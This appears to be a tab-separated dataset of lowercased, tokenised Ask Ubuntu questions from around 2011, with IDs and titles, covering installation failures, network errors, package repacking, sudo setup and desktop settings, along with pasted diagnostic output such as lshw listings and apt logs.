3675074 /lib/i386-linux-gnu/ld-2.13.so 00c89000-00c8a000 rw-p 0001e000 08:01 3675074 /lib/i386-linux-gnu/ld-2.13.so 00d26000-00d2f000 r-xp 00000000 08:01 393616 /usr/lib/perl/5.12.4/auto/list/util/util.so 00d2f000-00d30000 r -- p 00008000 08:01 393616 /usr/lib/perl/5.12.4/auto/list/util/util.so 00d30000-00d31000 rw-p 00009000 08:01 393616 /usr/lib/perl/5.12.4/auto/list/util/util.so 00d51000-00d5c000 r-xp 00000000 08:01 3675086 /lib/i386-linux-gnu/libnss_files-2.13.so 00d5c000-00d5d000 r -- p 0000a000 08:01 3675086 /lib/i386-linux-gnu/libnss_files-2.13.so 00d5d000-00d5e000 rw-p 0000b000 08:01 3675086 /lib/i386-linux-gnu/libnss_files-2.13.so 00da1000-00dba000 r-xp 00000000 08:01 393629 /usr/lib/perl/5.12.4/auto/posix/posix.so 00dba000-00dbc000 r -- p 00018000 08:01 393629 /usr/lib/perl/5.12.4/auto/posix/posix.so 00dbc000-00dbd000 rw-p 0001a000 08:01 393629 /usr/lib/perl/5.12.4/auto/posix/posix.so 00e02000-00e0c000 r-xp 00000000 08:01 3675088 /lib/i386-linux-gnu/libnss_nis-2.13.so 00e0c000-00e0d000 r -- p 00009000 08:01 3675088 /lib/i386-linux-gnu/libnss_nis-2.13.so 00e0d000-00e0e000 rw-p 0000a000 08:01 3675088 /lib/i386-linux-gnu/libnss_nis-2.13.so 00ed8000-00edb000 r-xp 00000000 08:01 3675080 /lib/i386-linux-gnu/libdl-2.13.so 00edb000-00edc000 r -- p 00002000 08:01 3675080 /lib/i386-linux-gnu/libdl-2.13.so 00edc000-00edd000 rw-p 00003000 08:01 3675080 /lib/i386-linux-gnu/libdl-2.13.so 00f00000-00f03000 r-xp 00000000 08:01 393618 /usr/lib/perl/5.12.4/auto/fcntl/fcntl.so 00f03000-00f04000 r -- p 00002000 08:01 393618 /usr/lib/perl/5.12.4/auto/fcntl/fcntl.so 00f04000-00f05000 rw-p 00003000 08:01 393618 /usr/lib/perl/5.12.4/auto/fcntl/fcntl.so 00f2a000-00f41000 r-xp 00000000 08:01 3675091 /lib/i386-linux-gnu/libpthread-2.13.so 00f41000-00f42000 r -- p 00016000 08:01 3675091 /lib/i386-linux-gnu/libpthread-2.13.so 00f42000-00f43000 rw-p 00017000 08:01 3675091 /lib/i386-linux-gnu/libpthread-2.13.so 00f43000-00f45000 rw-p 00000000 00:00 0 00f6f000-00f70000 r-xp 00000000 00:00 0 [ vdso ] 08048000-081a0000 r-xp 00000000 08:01 131240 /usr/bin/perl 081a0000-081a1000 r -- p 00157000 08:01 131240 /usr/bin/perl 081a1000-081a3000 rw-p 00158000 08:01 131240 /usr/bin/perl 093ac000-0a565000 rw-p 00000000 00:00 0 [ heap ] b7300000-b7321000 rw-p 00000000 00:00 0 b7321000-b7400000 -- -p 00000000 00:00 0 b74dd000-b74de000 r -- p 00859000 08:01 136189 /usr/lib/locale/locale-archive b74de000-b751e000 r -- p 002bd000 08:01 136189 /usr/lib/locale/locale-archive b751e000-b771e000 r -- p 00000000 08:01 136189 /usr/lib/locale/locale-archive b771e000-b7720000 rw-p 00000000 00:00 0 b7730000-b7732000 rw-p 00000000 00:00 0 bfd59000-bfd7a000 rw-p 00000000 00:00 0 [ stack ] selecting previously deselected package libnspr4-0d . ( reading database ... 156539 files and directories currently installed . ) unpacking libnspr4-0d ( from ... /libnspr4-0d_4.8.7-0ubuntu3_i386.deb ) ... selecting previously deselected package libcurl3 . unpacking libcurl3 ( from ... /libcurl3_7.21.6-3ubuntu3_i386.deb ) ... setting up libnspr4-0d ( 4.8.7-0ubuntu3 ) ... setting up libcurl3 ( 7.21.6-3ubuntu3 ) ... setting up google-chrome-stable ( 14.0.835.163-r101024 ) ... update-alternatives : using /usr/bin/google-chrome to provide /usr/bin/x-www-browser ( x-www-browser ) in auto mode . update-alternatives : using /usr/bin/google-chrome to provide /usr/bin/gnome-www-browser ( gnome-www-browser ) in auto mode . processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for menu ... and after all this got the chrome installed along with some other software from the update manager
62904	clean install hd problems	just got a brand new box ( msi h61m motherboard ) and i 'm trying to install ubuntu 11.04 on it from a cd i just burned . right off the bat , if i try to install from cd it loads directly into busybox with : unable to find a medium containing a live file system sounds like a sata mode problem , which by default is in ide mode . so , if i try changing to ahci mode , i manage to boot with the cd , but the install will not continue . when i check df i see that indeed the hard disk is not identified . what is the proper procedure for this case ?
62907	how to stop crashing my system while using pci-x1 capture cards ?	11.04 64-bit ubuntu . i reinstall third times and just after installation i have this screen : now trying with bios to disable the pci-x1 card somehow if i can login at-least else i have to use a livecd mode to check the lshw . ubuntu @ ubuntu : ~ $ sudo lshw ubuntu description : desktop computer product : ( ) width : 64 bits capabilities : smbios-2.7 dmi-2.7 vsyscall64 vsyscall32 configuration : boot=normal chassis=desktop uuid=deeb0a4a-7f52-11e0-8f74-0013d4d9c9f6 *-core description : motherboard product : dh67bl vendor : intel corporation physical id : 0 version : aag10189-206 serial : btbl1200086f slot : to be filled by o.e.m . *-firmware description : bios vendor : intel corp. physical id : 0 version : blh6710h.86a.0125.2011.0705.1517 date : 07/05/2011 size : 64kib capacity : 960kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb biosbootspecification *-cpu description : cpu product : intel ( r ) core ( tm ) i7-2600 cpu @ 3.40ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) core ( tm ) i7-2600 cpu @ 3.40ghz serial : to be filled by o.e.m . slot : lga1155 size : 3401mhz capacity : 4ghz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 sse4_2 x2apic popcnt aes xsave avx lahf_lm ida arat epb xsaveopt pln pts tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : cores=4 enabledcores=1 threads=2 *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 32kib capacity : 32kib capabilities : internal write-back unified *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 1mib capacity : 1mib capabilities : internal varies unified *-cache:2 description : l3 cache physical id : 7 slot : l3-cache size : 8mib capacity : 8mib capabilities : internal unified *-memory description : system memory physical id : 26 slot : system board or motherboard size : 8gib *-bank:0 description : dimm synchronous [ empty ] product : array1_partnumber0 vendor : a1_manufacturer0 physical id : 0 serial : a1_sernum0 slot : dimm3 width : 64 bits *-bank:1 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : 9905471-011.a00lf vendor : kingston physical id : 1 serial : 4c2add9c slot : dimm1 size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:2 description : dimm synchronous [ empty ] product : array1_partnumber2 vendor : a1_manufacturer2 physical id : 2 serial : a1_sernum2 slot : dimm4 width : 64 bits *-bank:3 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : 9905471-011.a00lf vendor : kingston physical id : 3 serial : 4b2bee27 slot : dimm2 size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-pci description : host bridge product : 2nd generation core processor family dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory : f7400000-f77fffff memory : e0000000-efffffff ioport : f000 ( size=64 ) *-communication unclaimed description : communication controller product : 6 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : latency=0 resources : memory : f7c29000-f7c2900f *-network description : ethernet interface product : 82579v gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth1 version : 05 serial : e0:69:95 : a2 : e2:8f capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.2.20-k2 firmware=0.13-4 latency=0 link=no multicast=yes port=twisted pair resources : irq:43 memory : f7c00000-f7c1ffff memory : f7c28000-f7c28fff ioport : f080 ( size=32 ) *-usb:0 description : usb controller product : 6 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:16 memory : f7c27000-f7c273ff *-multimedia description : audio device product : 6 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:54 memory : f7c20000-f7c23fff *-pci:0 description : pci bridge product : 6 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : e000 ( size=4096 ) memory : f7b00000-f7bfffff *-pci description : pci bridge product : integrated technology express , inc. vendor : integrated technology express , inc. physical id : 0 bus info : pci @ 0000:01:00.0 version : 10 width : 32 bits clock : 33mhz capabilities : pci pciexpress pm normal_decode bus_master cap_list resources : ioport : e000 ( size=4096 ) memory : f7b00000-f7bfffff *-network description : ethernet interface product : dge-528t gigabit ethernet adapter vendor : d-link system inc physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : 14 : d6:4d:1a : b1 : c9 size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 66mhz capabilities : pm bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=81.164.42.157 latency=64 link=yes maxlatency=64 mingnt=32 multicast=yes port=mii speed=100mbit/s resources : irq:16 ioport : e000 ( size=256 ) memory : f7b20000-f7b200ff memory : f7b00000-f7b1ffff *-pci:1 description : pci bridge product : 6 series chipset family pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 memory : f7800000-f79fffff *-multimedia unclaimed description : multimedia video controller product : blackmagic design vendor : blackmagic design physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7900000-f79fffff memory : f7800000-f78fffff *-pci:2 description : pci bridge product : 6 series chipset family pci express root port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 memory : f7a00000-f7afffff *-usb description : usb controller product : upd720200 usb 3.0 host controller vendor : nec corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:19 memory : f7a00000-f7a01fff *-usb:1 description : usb controller product : 6 series chipset family usb enhanced host controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : f7c26000-f7c263ff *-isa description : isa bridge product : h67 express chipset family lpc controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 05 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : 6 series chipset family 6 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi0 version : 05 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:44 ioport : f0d0 ( size=8 ) ioport : f0c0 ( size=4 ) ioport : f0b0 ( size=8 ) ioport : f0a0 ( size=4 ) ioport : f060 ( size=32 ) memory : f7c25000-f7c257ff *-disk description : ata disk product : wdc wd5000aakx-0 vendor : western digital physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 15.0 serial : wd-wmayu2762677 size : 465gib ( 500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=000a06a4 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 1.0 serial : 3c48b46a-531b-4bfc-af13-b8f3b334ff5b size : 457gib capacity : 457gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink extents ext4 ext2 initialized configuration : created=2011-09-25 23:06:00 filesystem=ext4 lastmountpoint=/ modified=2011-09-25 23:11:04 mounted=2011-09-25 23:19:12 state=clean *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 8097mib capacity : 8097mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 8097mib capabilities : nofs *-serial unclaimed description : smbus product : 6 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 05 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f7c24000-f7c240ff ioport : f040 ( size=32 ) *-scsi physical id : 1 bus info : usb @ 1:1.5 logical name : scsi6 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 6:0.0.0 logical name : /dev/sdb size : 1910mib ( 2002mb ) capabilities : partitioned partitioned : dos configuration : signature=c3072e18 *-volume description : windows fat volume vendor : syslinux physical id : 1 bus info : scsi @ 6:0.0.0,1 logical name : /dev/sdb1 logical name : /cdrom version : fat16 serial : 1f56-1ac9 size : 1902mib capacity : 1906mib capabilities : primary bootable fat initialized configuration : fats=2 filesystem=fat label=usb2 mount.fstype=vfat mount.options=ro , noatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , errors=remount-ro state=mounted
62908	no internet connection , ifconfig shows errors	i'veen using ubuntu for long time now but lately facing a new problem with the network adapter . i am not able to connect to the internet . after searching the internet for a while , i found out that my network card is not receiving any packets . output from ifconfig : root @ sundar-ubuntu : /etc # ifconfig eth0 link encap : ethernet hwaddr 82:4d:41:2a:3d : aa inet6 addr : fe80 : :804d:41ff : fe2a:3daa/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:82169 dropped:0 overruns:0 frame:82169 tx packets:29 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:8380 ( 8.3 kb ) interrupt:42 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:140 errors:0 dropped:0 overruns:0 frame:0 tx packets:140 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:11088 ( 11.0 kb ) tx bytes:11088 ( 11.0 kb ) any suggestions ?
62912	shutdown -p works , but shutdown -r does not	i have a headless ubuntu server 11.04 box . if i use : sudo shutdown -p now it works every time . however , if i instead want to simply restart the machine : sudo shutdown -r now it fails to do so . here 's a screenshot of what i get when i attempt to shutdown with restart ( could n't figure out which log to get this from ) . it simply spits this out on the screen and then does n't progress any further . i have to hold the power button in to turn the machine off after this : ( link to full-size image ) can anyone surmise what might be the problem here ? or perhaps provide some guidance as to how i might diagnose this ?
62913	how to install upstart ?	i use ubuntu 10.04 . i install upstart with failed dependencies . sam @ sam-desktop : ~ $ sudo apt-get install upstart reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : upstart : depends : libnih-dbus1 ( > = 1.0.0 ) but it is not going to be installed depends : libnih1 ( > = 1.0.0 ) but it is not going to be installed depends : mountall but it is not going to be installed e : broken packages sam @ sam-desktop : ~ $ my sources.list : deb cdrom : [ ubuntu 10.04.3 lts _lucid lynx_ - release i386 ( 20110720.1 ) ] / lucid main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //tw.archive.ubuntu.com/ubuntu/ lucid main restricted deb-src http : //tw.archive.ubuntu.com/ubuntu/ lucid main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //tw.archive.ubuntu.com/ubuntu/ lucid-updates main restricted deb-src http : //tw.archive.ubuntu.com/ubuntu/ lucid-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //tw.archive.ubuntu.com/ubuntu/ lucid universe deb-src http : //tw.archive.ubuntu.com/ubuntu/ lucid universe deb http : //tw.archive.ubuntu.com/ubuntu/ lucid-updates universe deb-src http : //tw.archive.ubuntu.com/ubuntu/ lucid-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //tw.archive.ubuntu.com/ubuntu/ lucid multiverse deb-src http : //tw.archive.ubuntu.com/ubuntu/ lucid multiverse deb http : //tw.archive.ubuntu.com/ubuntu/ lucid-updates multiverse deb-src http : //tw.archive.ubuntu.com/ubuntu/ lucid-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //tw.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # deb-src http : //tw.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu lucid partner # deb-src http : //archive.canonical.com/ubuntu lucid partner deb http : //security.ubuntu.com/ubuntu lucid-security main restricted deb-src http : //security.ubuntu.com/ubuntu lucid-security main restricted deb http : //security.ubuntu.com/ubuntu lucid-security universe deb-src http : //security.ubuntu.com/ubuntu lucid-security universe deb http : //security.ubuntu.com/ubuntu lucid-security multiverse deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse deb http : //archive.ubuntu.com/ubuntu/ maverick-updates main universe restricted deb-src http : //archive.ubuntu.com/ubuntu/ maverick-updates main universe restricted deb http : //security.ubuntu.com/ubuntu maverick-security main restricted deb-src http : //security.ubuntu.com/ubuntu maverick-security main restricted deb http : //security.ubuntu.com/ubuntu maverick-security universe deb-src http : //security.ubuntu.com/ubuntu maverick-security universe deb http : //security.ubuntu.com/ubuntu maverick-security multiverse deb-src http : //security.ubuntu.com/ubuntu maverick-security multiverse how to solve it ?
62919	how do i make/extract/modify source of a package and repack it ?	i have a package which has bug , and i need to modify it , and repack it , so thats how i am doing . is there any other quick methods ? list/view only ( drivers files or applications ) ar tv desktopvideo-8.0.1-amd64.deb rw-r -- r -- 0/0 4 sep 25 07:35 2011 debian-binary rw-r -- r -- 0/0 14942208 sep 25 07:35 2011 control.tar.gz rw-r -- r -- 0/0 102 sep 25 07:35 2011 data.tar.gz extract ar x desktopvideo-8.0.1-amd64.deb control.tar.gz data.tar.gz debian-binary extract tar.gz tar xvfz control.tar.gz tar xvfz data.tar.gz ; ; modify my codes and updates repack/rebuild this back mkdir -p debian/debian ; step 1 cp -r ./debian-binary debina/debian cp -r ./control debian/debian cp -r ./control debian/debian cp -r ./control debian/debian ; step 2 cp -r ./etc debian/debian cp -r ./usr debian/debian make .deb now ; this is how the skeleton look like before applying -- build root @ desktop : ~/downloads/test # ls control.tar.gz data.tar.gz debian debian-binary etc usr root @ desktop : ~/downloads/test # dpkg-deb -- build debian dpkg-deb : building package `desktopvideo ' in `debian.deb ' . -- failed # dpkg -i desktopvideo-8.0.1-amd64.deb dpkg : error processing desktopvideo-8.0.1-amd64.deb ( -- install ) : unable to open file '/var/lib/dpkg/tmp.ci//etc ' : is a directory errors were encountered while processing : desktopvideo-8.0.1-amd64.deb
62927	how do i set the default icon set and wallpaper for new users ?	i would like to change the default icon set and wallpaper so when a new user is created they have them automatically .
62928	why does n't /tmp use tmpfs ?	i have loads of ram and i use very little . i also do record some screencasts with gtk-recordmydesktop , which by default saves to /tmp while recording . i assumed that it would mean storing to ram as much as possible , but then i actually checked and found that /tmp is n't mounted with tmpfs . why is that ?
62930	which of all console web browsers is the most practical ?	there are a lot of console browsers , links2 , lynx , w3m and elinks ( i only know these ) . i want to know which one of all console browsers are most practical to browse with if you are logged into a server via ssh and have to browse the web . i need a good console browser because i want to be able to connect to the server with any client that has ssh . i do n't want to limit the question by specifying on a specific server or client . no gui ( it 's a server via ssh i mean come on ! ) send emails with files be able to log into gmail and other `` secure '' sites .
62934	can not locate app	first a small note : my ubuntu installed not in english language , so i could be wrong in names of some gui elements . in unity menu ( the on that appear when you click `` super '' or button with symbol that should n't be named here ) , when i make a search for a program i see there an icon of old game , probably dos game , or early win game , which i some years ago tried to install on wine or maybe not ( not sure about fact of appearance that game on my computer ) . the problem is that i can not delete that icon . i can not found this app in my package manager , i even uninstall wine , but it still there , and the strangest part , when i click on that icon - nothing happens . i tried to search my computer for the files with that name , but with no results . is there any place where program can hides in my computer , but be visible for this unity app search ?
62935	did ubuntu one lose my firefox bookmarks or do n't they get synced ?	i had to reinstall ubuntu and expected that ubuntu one would restore my bookmarks like it did the last time , but nothing happens . how can i find out whether they are actually lost or just not synced at the moment ? the ubuntu one status page says : 2011-08-26 syncing of contacts and bookmarks is not working for some users due to server issues . we are currently upgrading hardware and making configuration changes on the client side that should resolve the syncing issues for those impacted .
62939	automatically run a command upon entering a certain directory ?	i 'm using virtualenv with django and so i have say two different directories say : ~/development/site1 ~/development/site2 so to set up my enviroment i normally go to ~/development/site1 then run source bin/activate . is it possible to have that command run automatically when i cd into one of these directories ?
62940	what is the reason for moving the dash button in 11.10 ?	why is it now located in the launcher rather than the top left ?
62941	how do i set the launcher to always show in unity 2d ?	i have install ubuntu 11.10 and use unity-2d . the unity-2d auto hide . i want it to be always show
62944	what does this specification mean -- > graphics card and monitor capable of 800x600 ?	well , i want to use 11.04 . i guess , my laptop has got a monitor size comfortably over 800x 600 . but it does n't has a graphics card . my configuration is : processor : intel core duo processor t2080 ( 1.73 ghz ) chipset : intel 945gm operating system : dos cache : 2 mb l2 cache memory : 512 mb ram hard disk drive : 80 gb 5400 rpm hdd optical drive : dvdrw/cdrw wireless : 802.11 abg display : 15.4 '' wxga tft video : shared as per intel gma950 modem : 56 kbps network card : 10/100 mbps ports : 4 usb 2.0 , s video out , ieee 1394 , headphone , mic in , vga , rj11 , rj45 , kensington lock slot others : bluetooth , 5 in 1 media card reader ( sd , mmc , ms , xd , sd pro ) . carry case : yes battery ( backup ) : 6 cell warranty : 1-year cci warranty so will i be able to download and use ubuntu 11.04 ?
62946	when are new kernels in an ubuntu release ?	due to a kernel bug i can not use 2.6.38-11-generic , so i 'm using 2.6.32-28-generic . when will there be a new kernel in 11.04 ?
62951	i crash my system often . how can i rollback to day one just like first installation in ubuntu 10.04 , 10.10 , 11.04 , 11.10 ?	i am experimenting my ubuntu box . i was installing 10.04 till 11.10. finally want to stay with one version for a while already made lot of mess , by building and changing kernel settings and etc.. so , now after messing it up things are not working like it should . how , can i do ? # rollback 0 .
62952	how to get back the »open parent« button in 11.10 ?	is it really true that nautilus 3.x has n't the »open parent« button any more ? today i tried the second beta of ubuntu 11.10 and i am deeply frustrated . since gnome3 and this whole unity thing it feels a bit of always having to be afraid , that a new release will remove some of the main functions you are using in all days work . back to the point : is there a chance to get it back ?
62956	i have a fujitsu siemens amilo pro v3515 laptop . where can i get the proper drivers ?	i have been using ubuntu for several weeks now . ( with some prior linux usage . ) several programs i have used have given me this error message : xlib : extension `` glx '' missing on display `` :0.0 '' . i think the error may be caused by not having the proper drivers . how can i fix this issue ? edit : lspci | grep vga gave me this output : 01:00.0 vga compatible controller : via technologies , inc. cn896/vn896/p4m900 [ chrome 9 hc ] ( rev 01 ) there are no additional drivers installed . i am using ubuntu 11.04 .
62963	how can i run virtualbox a different tty ?	my knowledge of ubuntu is still fairly limited , but i know i can switch terminals with ctrl+alt+f* . i was just wondering if it 's possible to load my virtualbox ( winxp in this case ) in one of those , that would be super handy . i currently have it set to auto-load on the right of my 2 workspaces , but still it sometimes messes up the host-key and stuff . just wondering !
62964	how can i get onboard ( the screen keyboard ) to stop launching every time i log in ?	for some strange reason ( i.e . i do n't have a tablet computer ) onboard , the on-screen keyboard , starts every time i log in . i 've checked startup applications , but it 's not listed there . what could be making it start like this , and how can i get it to stop ?
62965	is it possible to set a defined area for multitouch gestures on an synaptics touchpad ?	i have a hp dm1z with one of those button-less click pads . i 'm running oneiric beta , and the multitouch functionality works - i 'm able to two finger scroll and move windows with a 3 finger gesture . however , drag and drop does n't work , since it thinks i 'm two-finger scrolling . this would be fixed if i could set the bottom edge of the touchpad to not count for multitouch gestures , but i would like to still be able to use it for simple pointer movement . i know areabottomedge would completely disable it ; i 'm looking for a way to only disable the multitouch features on that section . is this possible ?
62969	why do n't ctrl+c and ctrl+v work in a terminal ?	ctrl+c an ctrl+v work well under my ubuntu except in a terminal : if i want to past something into a terminal , i need to right click mouse and choose paste ; if i want to copy something from a terminal , i need to right click mouse and choose copy ... does anyone know how to enable ctrl+c an ctrl+v in terminal ? thank you very much
62971	how can i fix my xvinfo ?	how can i fix my x server/driver ? $ xvinfo x-video extension version 2.2 screen # 0 no adaptors present additional info : $ uname -a linux desktop 2.6.32-33-generic # 70-ubuntu smp thu jul 7 21:13:52 utc 2011 x86_64 gnu/linux $ lspci 00:00.0 host bridge : intel corporation device 0100 ( rev 09 ) 00:02.0 vga compatible controller : intel corporation sandy bridge integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation cougar point heci controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation device 1503 ( rev 05 ) 00:1a.0 usb controller : intel corporation cougar point usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation cougar point high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation cougar point pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation cougar point pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation cougar point pci express root port 4 ( rev b5 ) 00:1d.0 usb controller : intel corporation cougar point usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation device 1c4a ( rev 05 ) 00:1f.2 sata controller : intel corporation cougar point 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation cougar point smbus controller ( rev 05 ) 01:00.0 pci bridge : integrated technology express , inc. device 8892 ( rev 10 ) 04:00.0 usb controller : nec corporation device 0194 ( rev 04 ) follow up : it seems in 64-bit its a mess doing existing approach . therefore , after upgrading to 12.04 64-bit this problems in same hardware is resolved ( of-course , i have now other drivers problem )
62979	how to remove open with menu items from nautilus after wine is deleted ?	i installed wine via the software center and later removed it . the problem is that i still have open with notepad and other right click menu items in nautilus . i checked if anything from wine remained in synaptic , but i did n't see any packages installed . i 'm using natty . is there a way i can remove these menu items ?
62985	allow user to execute sudo commands	i 've looked at add user to `` sudo '' group and added user ( say 'abc ' ) to sudo group but now when user 'abc ' tries to use sudo commands ubuntu says , 'abc ' is not in sudoers list , this incident will be reported . btw i 'm using ubuntu server 11.04 if it matters . thanks
62988	how do i `` reload '' ubuntu software center ?	using ubuntu software center in 11.10 seems to be impossible to reload . for example , when i go to software sources and activate the universe repo , usc does not automatically reload and so activate the universe repo . and i can find no `` reload '' button as exists in synaptic . but on a clean install i ca n't install synaptic because i ca n't get the universe repo activated cause i do n't know how to get usc to reload . i wish synaptic was kept in the main repo .
62992	is there a program to manage movies and tv shows that supports mp4 tags ?	i 'm looking for a media manager that will display and play movies and tv shows and will read data included in mp4 and m4v files . so far i 've looked at xbmc , moovida and boxee and all of these seem to keep their own separate database or xml files for reading and storing tag information . i also looked at banshee because of this answer , but it did n't read my tags . banshee is also geared towards music videos instead of actual movies and tv shows . so i 'm looking for software that displays and plays movies and tv shows reads mp4 and m4v tags preferably something with bulk import ( i.e. , i do n't want to add 1,000 items to a new library ) bonus if it also has a tag editor bonus if it 's an xbmc extension
